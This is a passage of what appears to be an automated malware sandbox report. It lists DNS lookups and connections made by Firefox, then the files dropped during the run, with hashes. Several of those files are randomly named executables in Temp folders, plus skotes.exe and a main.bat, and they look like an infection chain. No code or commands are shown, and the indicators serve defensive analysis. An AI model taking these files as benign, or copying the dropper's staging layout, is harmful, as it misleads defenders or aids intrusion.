                        DNS Request

                        prod.remote-settings.prod.webservices.mozgcp.net

                        DNS Request

                        prod.remote-settings.prod.webservices.mozgcp.net

                      • 8.8.8.8:53
                        prod.ads.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        82 B
                        98 B
                        1
                        1

                        DNS Request

                        prod.ads.prod.webservices.mozgcp.net

                        DNS Response

                        34.117.188.166

                      • 8.8.8.8:53
                        prod.ads.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        82 B
                        175 B
                        1
                        1

                        DNS Request

                        prod.ads.prod.webservices.mozgcp.net

                      • 8.8.8.8:53
                        prod.pocket.prod.cloudops.mozgcp.net
                        dns
                        firefox.exe
                        82 B
                        98 B
                        1
                        1

                        DNS Request

                        prod.pocket.prod.cloudops.mozgcp.net

                        DNS Response

                        34.120.5.221

                      • 8.8.8.8:53
                        prod.pocket.prod.cloudops.mozgcp.net
                        dns
                        firefox.exe
                        82 B
                        110 B
                        1
                        1

                        DNS Request

                        prod.pocket.prod.cloudops.mozgcp.net

                        DNS Response

                        2600:1901:0:524c::

                      • 8.8.8.8:53
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        106 B
                        122 B
                        1
                        1

                        DNS Request

                        attachments.prod.remote-settings.prod.webservices.mozgcp.net

                        DNS Response

                        34.117.121.53

                      • 8.8.8.8:53
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        106 B
                        199 B
                        1
                        1

                        DNS Request

                        attachments.prod.remote-settings.prod.webservices.mozgcp.net

                      • 8.8.8.8:53
                        prod.balrog.prod.cloudops.mozgcp.net
                        dns
                        firefox.exe
                        82 B
                        98 B
                        1
                        1

                        DNS Request

                        prod.balrog.prod.cloudops.mozgcp.net

                        DNS Response

                        35.244.181.201

                      • 8.8.8.8:53
                        prod.balrog.prod.cloudops.mozgcp.net
                        dns
                        firefox.exe
                        164 B
                        175 B
                        2
                        1

                        DNS Request

                        prod.balrog.prod.cloudops.mozgcp.net

                        DNS Request

                        prod.balrog.prod.cloudops.mozgcp.net

                      • 8.8.8.8:53
                        ciscobinary.openh264.org
                        dns
                        firefox.exe
                        140 B
                        286 B
                        2
                        1

                        DNS Request

                        ciscobinary.openh264.org

                        DNS Request

                        ciscobinary.openh264.org

                        DNS Response

                        88.221.134.155
                        88.221.134.209

                      • 8.8.8.8:53
                        a19.dscg10.akamai.net
                        dns
                        firefox.exe
                        67 B
                        99 B
                        1
                        1

                        DNS Request

                        a19.dscg10.akamai.net

                        DNS Response

                        88.221.134.209
                        88.221.134.155

                      • 8.8.8.8:53
                        a19.dscg10.akamai.net
                        dns
                        firefox.exe
                        67 B
                        123 B
                        1
                        1

                        DNS Request

                        a19.dscg10.akamai.net

                        DNS Response

                        2a02:26f0:a1::58dd:869b
                        2a02:26f0:a1::58dd:86d1

                      • 8.8.8.8:53
                        redirector.gvt1.com
                        dns
                        firefox.exe
                        65 B
                        81 B
                        1
                        1

                        DNS Request

                        redirector.gvt1.com

                        DNS Response

                        172.217.20.174

                      • 8.8.8.8:53
                        redirector.gvt1.com
                        dns
                        firefox.exe
                        65 B
                        81 B
                        1
                        1

                        DNS Request

                        redirector.gvt1.com

                        DNS Response

                        172.217.20.174

                      • 8.8.8.8:53
                        redirector.gvt1.com
                        dns
                        firefox.exe
                        65 B
                        93 B
                        1
                        1

                        DNS Request

                        redirector.gvt1.com

                        DNS Response

                        2a00:1450:4007:80c::200e

                      • 172.217.20.174:443
                        redirector.gvt1.com
                        https
                        firefox.exe
                        4.8kB
                        11.5kB
                        35
                        23
                      • 8.8.8.8:53
                        r4---sn-aigzrnsz.gvt1.com
                        dns
                        firefox.exe
                        71 B
                        116 B
                        1
                        1

                        DNS Request

                        r4---sn-aigzrnsz.gvt1.com

                        DNS Response

                        74.125.175.169

                      • 8.8.8.8:53
                        r4.sn-aigzrnsz.gvt1.com
                        dns
                        firefox.exe
                        69 B
                        85 B
                        1
                        1

                        DNS Request

                        r4.sn-aigzrnsz.gvt1.com

                        DNS Response

                        74.125.175.169

                      • 8.8.8.8:53
                        r4.sn-aigzrnsz.gvt1.com
                        dns
                        firefox.exe
                        69 B
                        97 B
                        1
                        1

                        DNS Request

                        r4.sn-aigzrnsz.gvt1.com

                        DNS Response

                        2a00:1450:4009:1b::9

                      • 74.125.175.169:443
                        r4.sn-aigzrnsz.gvt1.com
                        https
                        firefox.exe
                        4.8kB
                        8.7kB
                        11
                        9

                      MITRE ATT&CK Enterprise v15

                      Downloads


                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                        Filesize

                        15KB

                        MD5

                        96c542dec016d9ec1ecc4dddfcbaac66

                        SHA1

                        6199f7648bb744efa58acf7b96fee85d938389e4

                        SHA256

                        7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                        SHA512

                        cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                      • C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe

                        Filesize

                        758KB

                        MD5

                        afd936e441bf5cbdb858e96833cc6ed3

                        SHA1

                        3491edd8c7caf9ae169e21fb58bccd29d95aefef

                        SHA256

                        c6491d7a6d70c7c51baca7436464667b4894e4989fa7c5e05068dde4699e1cbf

                        SHA512

                        928c15a1eda602b2a66a53734f3f563ab9626882104e30ee2bf5106cfd6e08ec54f96e3063f1ab89bf13be2c8822a8419f5d8ee0a3583a4c479785226051a325

                      • C:\Users\Admin\AppData\Local\Temp\1018208001\fcc74b3f6b.exe

                        Filesize

                        1.8MB

                        MD5

                        25fb9c54265bbacc7a055174479f0b70

                        SHA1

                        4af069a2ec874703a7e29023d23a1ada491b584e

                        SHA256

                        552f8be2c6b2208a89c728f68488930c661b3a06c35a20d133ef7d3c63a86b9c

                        SHA512

                        7dfd9e0f3fa2d68a6ce8c952e3b755559db73bb7a06c95ad6ed8ac16dedb49be8b8337afc07c9c682f0c4be9db291a551286353e2e2b624223487dc1c8b54668

                      • C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe

                        Filesize

                        1.1MB

                        MD5

                        ef08a45833a7d881c90ded1952f96cb4

                        SHA1

                        f04aeeb63a1409bd916558d2c40fab8a5ed8168b

                        SHA256

                        33c236dc81af2a47d595731d6fa47269b2874b281152530fdffdda9cbeb3b501

                        SHA512

                        74e84f710c90121527f06d453e9286910f2e8b6ac09d2aeb4ab1f0ead23ea9b410c5d1074d8bc759bc3e766b5bc77d156756c7df093ba94093107393290ced97

                      • C:\Users\Admin\AppData\Local\Temp\1018210001\4ab1990554.exe

                        Filesize

                        1.8MB

                        MD5

                        ff279f4e5b1c6fbda804d2437c2dbdc8

                        SHA1

                        2feb3762c877a5ae3ca60eeebc37003ad0844245

                        SHA256

                        e115298ab160da9c7a998e4ae0b72333f64b207da165134ca45eb997a000d378

                        SHA512

                        c7a8bbcb122b2c7b57c8b678c5eed075ee5e7c355afbf86238282d2d3458019da1a8523520e1a1c631cd01b555f7df340545fd1e44ad678dc97c40b23428f967

                      • C:\Users\Admin\AppData\Local\Temp\1018211001\fb41eb2b6d.exe

                        Filesize

                        1.9MB

                        MD5

                        abb79baa6d562c30a354894a74a2674f

                        SHA1

                        a3a3c512c328e43c101d0a3a5f1a76e2d5bb7012

                        SHA256

                        a14c4a9f9adb6224e5abaa97a69536abbe5a95c320c28397d572e47660cdf4dd

                        SHA512

                        bd0fb0c3f07acb294a9387a75ed1802c834a15937bbc7c4dc5a304382649d998f1dedcf2a27df730ede0656eeeb73462411eff392dd649ecf8d9863c5d718310

                      • C:\Users\Admin\AppData\Local\Temp\1018212001\7e8e0935c9.exe

                        Filesize

                        21KB

                        MD5

                        14becdf1e2402e9aa6c2be0e6167041e

                        SHA1

                        72cbbae6878f5e06060a0038b25ede93b445f0df

                        SHA256

                        7a769963165063758f15f6e0cece25c9d13072f67fa0d3c25a03a5104fe0783a

                        SHA512

                        16b837615505f352e134afd9d8655c9cabfa5bfcfbee2c0c34f2d7d9588aa71f875e4e5feb8cdf0f7bacc00f7c1ca8dabd3b3d92afc99abf705c05c78e298b4a

                      • C:\Users\Admin\AppData\Local\Temp\1018213001\bb52f2e013.exe

                        Filesize

                        4.2MB

                        MD5

                        3a425626cbd40345f5b8dddd6b2b9efa

                        SHA1

                        7b50e108e293e54c15dce816552356f424eea97a

                        SHA256

                        ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1

                        SHA512

                        a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668

                      • C:\Users\Admin\AppData\Local\Temp\1018214001\16d019449f.exe

                        Filesize

                        4.2MB

                        MD5

                        1d057672840921889505863b33e87671

                        SHA1

                        3bbc68098e4080f656c7f92147a54d05d18e1277

                        SHA256

                        e4420b07cff76b9f623b1e9ed3957d708769a744f245e27fb3b1e44cdc67eb35

                        SHA512

                        12f5d869fea831d66f0811bc00a2c25e4d156f24189a7eee3e4593d0062057638686f780132a188f52ac6de9fba78404517ca041205c6834dd135217d0ab4eed

                      • C:\Users\Admin\AppData\Local\Temp\1018215001\3fc6c7cc3a.exe

                        Filesize

                        4.3MB

                        MD5

                        d460614a38afe39ba7ca3fe331c0de53

                        SHA1

                        d150e613032919a2a4da84c26f17bdbe5112f847

                        SHA256

                        8bff2b1dd2b8b6b4e09d448eecca556b368db5ea69581d64f7a8201e974d90ef

                        SHA512

                        cc02f6d6c4c4a5f66a9cb7fcf8c2378651d882c408492a3e3e51b9e011ac5f39148ec665d422ef7ce7ee4f9741e30fb875c77f0a8e2f4b43088cd5d43a6c3b52

                      • C:\Users\Admin\AppData\Local\Temp\1018216001\d5ca7bb125.exe

                        Filesize

                        791KB

                        MD5

                        e8af4d0d0b47ac68d762b7f288ae8e6e

                        SHA1

                        1d65f31526cc20ab41d6b1625d6674d7f13e326c

                        SHA256

                        b83449768e7af68867c8bc42b19ff012722d88ea66aef69df48661e63e0eb15e

                        SHA512

                        80fad90314ff639f538a72c5e4ca2bf9ae52b9309caa7cd6f87d61791505bb3612b7f3190ab9b67348c5d71f4d29bb9d101e3f66d525eb9b5e2060a10b2d187a

                      • C:\Users\Admin\AppData\Local\Temp\1018217001\52d5fcdb6e.exe

                        Filesize

                        1.3MB

                        MD5

                        669ed3665495a4a52029ff680ec8eba9

                        SHA1

                        7785e285365a141e307931ca4c4ef00b7ecc8986

                        SHA256

                        2d2d405409b128eea72a496ccff0ed56f9ed87ee2564ae4815b4b116d4fb74d6

                        SHA512

                        bedc8f7c1894fc64cdd00ebc58b434b7d931e52c198a0fa55f16f4e3d44a7dc4643eaa78ec55a43cc360571345cd71d91a64037a135663e72eed334fe77a21e6

                      • C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe

                        Filesize

                        3.1MB

                        MD5

                        c00a67d527ef38dc6f49d0ad7f13b393

                        SHA1

                        7b8f2de130ab5e4e59c3c2f4a071bda831ac219d

                        SHA256

                        12226ccae8c807641241ba5178d853aad38984eefb0c0c4d65abc4da3f9787c3

                        SHA512

                        9286d267b167cba01e55e68c8c5582f903bed0dd8bc4135eb528ef6814e60e7d4dda2b3611e13efb56aa993635fbab218b0885daf5daea6043061d8384af40ca

                      • C:\Users\Admin\AppData\Local\Temp\1018219001\e57707a59c.exe

                        Filesize

                        21KB

                        MD5

                        04f57c6fb2b2cd8dcc4b38e4a93d4366

                        SHA1

                        61770495aa18d480f70b654d1f57998e5bd8c885

                        SHA256

                        51e4d0cbc184b8abfa6d84e219317cf81bd542286a7cc602c87eb703a39627c2

                        SHA512

                        53f95e98a5eca472ed6b1dfd6fecd1e28ea66967a1b3aa109fe911dbb935f1abf327438d4b2fe72cf7a0201281e9f56f4548f965b96e3916b9142257627e6ccd

                      • C:\Users\Admin\AppData\Local\Temp\1018220001\dee2c68b58.exe

                        Filesize

                        1.8MB

                        MD5

                        f158cdb34eb5c4de5eb858cce72f94cb

                        SHA1

                        e93703e534ee3572c5134be5b316e1ae5feeb9c0

                        SHA256

                        801900fc452dc3d0f333fe3be08e78406099be541daff50b7de46f4209d54c0c

                        SHA512

                        a913c9e2f3bcd7b6016aa43838679ee3664d042c7457d97c75ed140659748f79a26c606c31c878a84207a6751111dc647292c2e7848c1a9d8c292622de16ce8c

                      • C:\Users\Admin\AppData\Local\Temp\1018221001\718410bf88.exe

                        Filesize

                        2.8MB

                        MD5

                        248411545685b7ff7b35c9be0067004c

                        SHA1

                        0610ead2ac9241ffd2ff1dfc334e2d0f2d1a31ca

                        SHA256

                        117b62e85dbbddf6a8dcf7c29df0195a45b46a38c4f5a6428fd6f470e2b41ea9

                        SHA512

                        6a29bf1c43c75248372fbee8119c3ce6c9dc2f607db917752e4bf696bf2be76854bcdacffccc625582b0fdedb49b0428b7b7e333e84e907f08b2f16ae343c03d

                      • C:\Users\Admin\AppData\Local\Temp\1018222001\e7be8f4ce0.exe

                        Filesize

                        946KB

                        MD5

                        bd79ee3850ed9f92a322f6ea487ab0cb

                        SHA1

                        9eb884d2feda4c3959f2f6878e7813264ee5716f

                        SHA256

                        373256d6ed3677d589bf34e4718e9c83708d1285eb5d88022d673c294d5c7bb2

                        SHA512

                        dbbdb73fe1668de519aa50ac95d759ecb067ed38d812960519060a9962f2a3243f9fa8ae7b89fe2a880d6436b3474b06fb562e55f450ae8bfc95c8209244feda

                      • C:\Users\Admin\AppData\Local\Temp\1018223001\ce6585282d.exe

                        Filesize

                        2.7MB

                        MD5

                        890d824cd79fe9a86ded6b64ed799ad7

                        SHA1

                        ad60b467cee30245b352715f4694cabe41b83470

                        SHA256

                        c34746b5895ab129dc4875e1ecb872799ac76ecda670146ccee25ef7dbf5ca44

                        SHA512

                        2dc81a856d3b0846c4b778d6c05cc183a029a88219ff42973ef1b5b3afacb629149c80abef88b9e5dc7ab5adaaf580b73e5d2eb67687bd8563587055e6e4f15b

                      • C:\Users\Admin\AppData\Local\Temp\1018224001\e0ef35828f.exe

                        Filesize

                        1.9MB

                        MD5

                        2725f2b0ffa89f08642d36caf06c3ce4

                        SHA1

                        bf882f33c5df5c498252e4cb149ffa11bda9b623

                        SHA256

                        7be3016ad7251eda873c02c362243710b73620c595a9ca34bd0a7c0f2055b11f

                        SHA512

                        4bf1c33808847d251b811262ff5ac3e30958794ff6a7916e96f1af884a605c078ef62001181bfacdfc80907575bd73d42ee9be4e78c01d2e3fa9f9b8bee2942f

                      • C:\Users\Admin\AppData\Local\Temp\CabE7D2.tmp

                        Filesize

                        70KB

                        MD5

                        49aebf8cbd62d92ac215b2923fb1b9f5

                        SHA1

                        1723be06719828dda65ad804298d0431f6aff976

                        SHA256

                        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                        SHA512

                        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                      • C:\Users\Admin\AppData\Local\Temp\TarE7E4.tmp

                        Filesize

                        181KB

                        MD5

                        4ea6026cf93ec6338144661bf1202cd1

                        SHA1

                        a1dec9044f750ad887935a01430bf49322fbdcb7

                        SHA256

                        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                        SHA512

                        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                        Filesize

                        2.9MB

                        MD5

                        cd7686b11754d77b8722880a1a3a9a43

                        SHA1

                        ea1c00d2985812539452a31d8f75506573dad692

                        SHA256

                        a3d6d7eea1a9270e20be65394c942207078daac5952a12a9404dd4c557fd2944

                        SHA512

                        64d095a52c5a9987cbdbe00c95cd96db67d5bf9faa9a53c1132eab27be7d0d8b7adf209195db8b925c6453ada759165ecfc8c1a5ac4f3ea7d3427fea2b643cab

                      • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

                        Filesize

                        1.6MB

                        MD5

                        72491c7b87a7c2dd350b727444f13bb4

                        SHA1

                        1e9338d56db7ded386878eab7bb44b8934ab1bc7

                        SHA256

                        34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                        SHA512

                        583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

                        Filesize

                        1.7MB

                        MD5

                        7187cc2643affab4ca29d92251c96dee

                        SHA1

                        ab0a4de90a14551834e12bb2c8c6b9ee517acaf4

                        SHA256

                        c7e92a1af295307fb92ad534e05fba879a7cf6716f93aefca0ebfcb8cee7a830

                        SHA512

                        27985d317a5c844871ffb2527d04aa50ef7442b2f00d69d5ab6bbb85cd7be1d7057ffd3151d0896f05603677c2f7361ed021eac921e012d74da049ef6949e3a3

                      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

                        Filesize

                        1.7MB

                        MD5

                        b7d1e04629bec112923446fda5391731

                        SHA1

                        814055286f963ddaa5bf3019821cb8a565b56cb8

                        SHA256

                        4da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789

                        SHA512

                        79fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db

                      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

                        Filesize

                        1.7MB

                        MD5

                        0dc4014facf82aa027904c1be1d403c1

                        SHA1

                        5e6d6c020bfc2e6f24f3d237946b0103fe9b1831

                        SHA256

                        a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7

                        SHA512

                        cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028

                      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

                        Filesize

                        3.3MB

                        MD5

                        cea368fc334a9aec1ecff4b15612e5b0

                        SHA1

                        493d23f72731bb570d904014ffdacbba2334ce26

                        SHA256

                        07e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541

                        SHA512

                        bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748

                      • C:\Users\Admin\AppData\Local\Temp\main\file.bin

                        Filesize

                        3.3MB

                        MD5

                        045b0a3d5be6f10ddf19ae6d92dfdd70

                        SHA1

                        0387715b6681d7097d372cd0005b664f76c933c7

                        SHA256

                        94b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d

                        SHA512

                        58255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b

                      • C:\Users\Admin\AppData\Local\Temp\main\main.bat

                        Filesize

                        440B

                        MD5

                        3626532127e3066df98e34c3d56a1869

                        SHA1

                        5fa7102f02615afde4efd4ed091744e842c63f78

                        SHA256

                        2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca

                        SHA512

                        dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd

                      • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                        Filesize

                        442KB

                        MD5

                        85430baed3398695717b0263807cf97c

                        SHA1

                        fffbee923cea216f50fce5d54219a188a5100f41

                        SHA256

                        a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                        SHA512

                        06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                      • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                        Filesize

                        8.0MB

                        MD5

                        a01c5ecd6108350ae23d2cddf0e77c17

                        SHA1

                        c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                        SHA256

                        345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                        SHA512

                        b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                        Filesize

                        7KB

                        MD5

                        47b5ce306c1db1e788778ebe8c48e73c

                        SHA1

                        317168b5807c0a0a45bc802ec755af9b03663693

                        SHA256

                        552f181325c5a30cf59e723fbb09aedae6e8276f0d5cbfc6b8d10900d6e12d65

                        SHA512

                        9f5c6d6f6aba2b73de580a7ef5c2c3565d2926a78aa78613e8ba56eba088a67d63e7adbb03e57eaeeafa7b305e96ef59f7ca847c48f8b88ce4e25bab9792cc66

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\db\data.safe.bin

                        Filesize

                        2KB

                        MD5

                        7d6240a86103b0f4344465ca1eb995b2

                        SHA1

                        90877a8827d9db95bf930ebc257068f2c581daef

                        SHA256

                        b8e7721559ad91f33358cfb42c03026ccc04e9072a738a9b0c7198ac12bebb88

                        SHA512

                        5a5052eb14ea19be75811178780f12f59064c83b77468b4585cb1a1053a1bba8f2b35fc5b80ede1df86c110b32cbf0219bac6462cd9713998e11c60092d1baa0

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\e12de424-93a0-406c-89fb-eaf93c44b333

                        Filesize

                        745B

                        MD5

                        28e85e1fb8915568a148d6566722ebcd

                        SHA1

                        3d46af1e6acfc4a325154d16b1a3d687d0063bcd

                        SHA256

                        16121cfe2342368d5bc9b1165c8ff4979d73cd2fd03e5a77a3b8f1e524ab620b

                        SHA512

                        314e3c2a296a60953ec7d151e2364f1df305729909e8a1a68602a06aa0b296d1b644edcfa4b2333d97a44c4fe0f314efd5806bf931516d51adda9f9b735284d8

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\fc25c80d-3b13-4bfa-adbf-045a250df766

                        Filesize

                        13KB

                        MD5

                        1c575df942b9a8f8b9244028504988ae

                        SHA1

                        46005f17ff3ff11f3f1ab3f8bb688f8ee9b89397

                        SHA256

                        31c8bbdb72e6a03bb017acaf7f4c1b0f4f22e88878205c62f3c2b0b3afb58bf0

                        SHA512

                        2e6dfe22794eb95af9727baa0f7ea7ac912bad6b01a9ea393f2264cbeb4d7db504b37485561d4cacd036355df7d9871b9a6380caba497f4a0b760bdfd002cf3b

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

                        Filesize

                        997KB

                        MD5

                        fe3355639648c417e8307c6d051e3e37

                        SHA1

                        f54602d4b4778da21bc97c7238fc66aa68c8ee34

                        SHA256

                        1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

                        SHA512

                        8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

                        Filesize

                        116B

                        MD5

                        3d33cdc0b3d281e67dd52e14435dd04f

                        SHA1

                        4db88689282fd4f9e9e6ab95fcbb23df6e6485db

                        SHA256

                        f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

                        SHA512

                        a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

                        Filesize

                        479B

                        MD5

                        49ddb419d96dceb9069018535fb2e2fc

                        SHA1

                        62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

                        SHA256

                        2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

                        SHA512

                        48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

                        Filesize

                        372B

                        MD5

                        8be33af717bb1b67fbd61c3f4b807e9e

                        SHA1

                        7cf17656d174d951957ff36810e874a134dd49e0

                        SHA256

                        e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

                        SHA512

                        6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

                        Filesize

                        11.8MB

                        MD5

                        33bf7b0439480effb9fb212efce87b13

                        SHA1

                        cee50f2745edc6dc291887b6075ca64d716f495a

                        SHA256

                        8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

                        SHA512

                        d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

                        Filesize

                        1KB

                        MD5

                        688bed3676d2104e7f17ae1cd2c59404

                        SHA1

                        952b2cdf783ac72fcb98338723e9afd38d47ad8e

                        SHA256

                        33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

                        SHA512

                        7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

                        Filesize

                        1KB

                        MD5

                        937326fead5fd401f6cca9118bd9ade9

                        SHA1

                        4526a57d4ae14ed29b37632c72aef3c408189d91

                        SHA256

                        68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

                        SHA512

                        b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

                        Filesize

                        6KB

                        MD5

                        23de7363ba9550e2f75334469df2a257

                        SHA1

                        10c3feee0c56e5b9532c092cfd2fe3a5fbd96f26

                        SHA256

                        c5841147d6795919fe604de725aaa61c9db56f0c611447a384a6bb1f001f5ad0

                        SHA512

                        ea226481625bbc116883768c1d4b4090d2cc2558cc19efd23097e95e4ea189e3447421c586e562756f5ef4a451366c27041618497d515d57aa0f6ecbe22cabf2

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

                        Filesize

                        6KB

                        MD5

                        e0e8f7bdf4f8571d8f71294b936d738e

                        SHA1

                        5fafa7890ecc63a2fabc5d2b609a2787e52bec12

                        SHA256

                        abbe921709d49ed272c07f50cbe9624186db65f5886fb444cc260cd1b70ceba0

                        SHA512

                        15f4cfb47830e7e6a2e0b3e906eb40f7751f6b416973e23cdbc045217614b9b3d1f096c1199b2db838d3c0705f6d5fa650dcd69eef04187bf7f711338ad43532

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

                        Filesize

                        7KB

                        MD5

                        c2fcde96e73a9475f400283fc4e82d30

                        SHA1

                        2fbab7c47cdca478e2c4b62cada7c857f815db64

                        SHA256

                        2a4dc98c7016f9b94d0da4643298fd7eee31129097a43b700d7bb520d7f17ea9

                        SHA512

                        daff4954e444dfc1aa98a2c3fcc4552162d24c4d6da71060a3f1267c3ff0aadebaab59a8f6ed3b6b9dd12a5fb8baa3e011f7e8614aaffe99eef25eacde4d8e0d

                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\prefs-1.js

                        Filesize

                        6KB

                        MD5

                        98f6bb2f7931b731c97f3f99158ed7bd

                        SHA1

                        dfcd74315f809489c5dc0c00c4f8c0c581bafdfe

                        SHA256

                        33d4e2ef0c54c207228a6f0b1096d66971e01a6866424c97bc00996b8f6b68e6

                        SHA512

                        c64e087f936aaeaee6d940c937668fc14cc0b6a63c8ec2eefee75e035772132a8452649a565cf9ef5f9401658cb2fed1098b39c839b4dd8d17b835c2aad14860

